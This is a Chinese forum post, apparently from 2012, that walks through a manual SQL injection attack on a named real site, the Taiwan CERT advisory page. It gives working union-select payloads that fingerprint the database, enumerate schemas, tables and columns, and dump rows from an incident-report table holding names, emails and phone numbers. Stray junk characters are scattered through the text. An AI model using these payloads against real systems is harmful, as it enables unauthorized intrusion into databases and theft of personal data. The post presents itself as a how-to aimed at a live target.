1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询/ b% M; E1 O0 v9 d
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解! b5 u' k) g; _; t7 k+ x
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--1 h2 M8 W3 F/ S( t& U
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--' x5 _! D( c4 B A
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
6 y* z( ?/ U- S+ a# w4.判断有没有写权限- I+ m9 K( d# L% m# e5 Y
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限& D9 e; l0 `5 c) i1 V h% U( e+ K
没办法,手动猜表啦
6 @: p# h+ J' D/ n; W0 ]5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,19 f8 F1 ]1 S b7 T7 y0 r* C
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
* {% x& w+ p1 r0 H3 Hhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--, d% E5 J3 U: p9 J1 v4 U
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
0 F' i: C) k9 {information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
6 ~" l- H# ~1 n" i6.爆表,爆的是twcert库% ~$ X6 `7 Z2 w) J2 q$ ^
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
# c+ g) v4 i" o5 |. H2 \) t( Q爆出如下表
9 ?* h x# A( T2 N0 W+ z) }downloadfile,irsys,newsdata,secrpt,secrpt_big5
0 O5 C4 s2 u1 }( b7.爆列名,这次爆的是irsys表3 v% u% d. R3 B
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--, M! ^6 D: l3 i6 _# J& d
爆出如下列+ I3 @/ p9 \( J% G* L" S7 a5 U( C% k
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
, `. Z$ C' w% Y' @" Z8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
8 d5 ~" D- u1 C9 e1 O2 q. \http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
% ^2 P0 R! j4 P$ O5 F返回是3,说明每个列里有3个地段( V/ L; P! m" r; _. C0 h4 B$ v3 \
9.爆字段内容
" m& S# W* p1 O% {) dhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
, p2 Z+ N4 U; R% U1 u9 L4 c爆出name列的第一个字段的内容* D3 W4 y5 d9 g2 z& W
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--+ c7 e" n, ^. I9 `" V0 i
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对